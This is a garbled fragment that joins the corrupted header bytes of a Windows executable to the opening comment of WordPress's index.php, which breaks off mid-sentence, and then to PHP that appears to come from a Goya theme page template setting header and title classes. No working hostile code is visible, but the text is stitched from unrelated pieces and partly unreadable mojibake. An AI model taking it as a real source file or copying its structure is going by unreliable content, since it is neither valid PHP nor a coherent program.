?MZ? ?? ? @ ? o ¡ä ¨ª!?L¨ª!This program cannot be run in DOS mode. $ 3B¡ä¡ä¡Â#¨²?¡Â#¨²?¡Â#¨²?¡¡é??A#¨²?¡¡éT??#¨²?¡¡é¨´??#¨²??£¤'??#¨²??£¤¨´?t#¨²??£¤T??#¨²??£¤???#¨²?¡¡é??e#¨²?¡Â#??{#¨²?s£¤T??#¨²?s£¤???#¨²?Rich¡Â#¨²? PE d? ??g e " * o €? @ P ¨º¡é? `¨¢€? ¨ª P ? ?? ` # @ t P¨¢ ¨¤ @ D .text 1 o `.rdata j+ D , ? @ @.data PS ¨º @ ¨¤.pdata # ` $ ? @ @.fptable ? @ ¨¤.rsrc ?? ? ? @ @.reloc t @ ? /** * Front to the WordPress application. This file doesn't do anything, but loads post_content ); $header_layout = get_post_meta(get_queried_object_id(), 'goya_page_header_layout', true); $title_style = get_post_meta(get_the_ID(), 'goya_page_title_style', true); $featured_image = get_post_meta(get_the_ID(), 'goya_page_hero_featured_image', true); $enable_pagepadding = ($header_layout == 'transparent') ? true : false; $image_id = $image_url = ''; if ($title_style == 'hero') { $classes[] = 'hero-header'; $title_class[] = 'hero-title'; if ($featured_image) { $classes[] = 'hero-title'; $classes[] = 'header-parallax'; $title_class[] = 'post-featured'; $title_class[] = 'parallax_image'; $title_class[] = 'vh-height'; if ( has_post_thumbnail() ) { $image_id = get_post_thumbnail_id(); $image_url = wp_get_attachment_image_src($image_id, 'full'); } } } else { $title_class[] = 'regular-title'; } $classes[] = ($enable_pagepadding || $title_style == 'hero' ) ? 'page-transparent' : 'page-padding'; ?>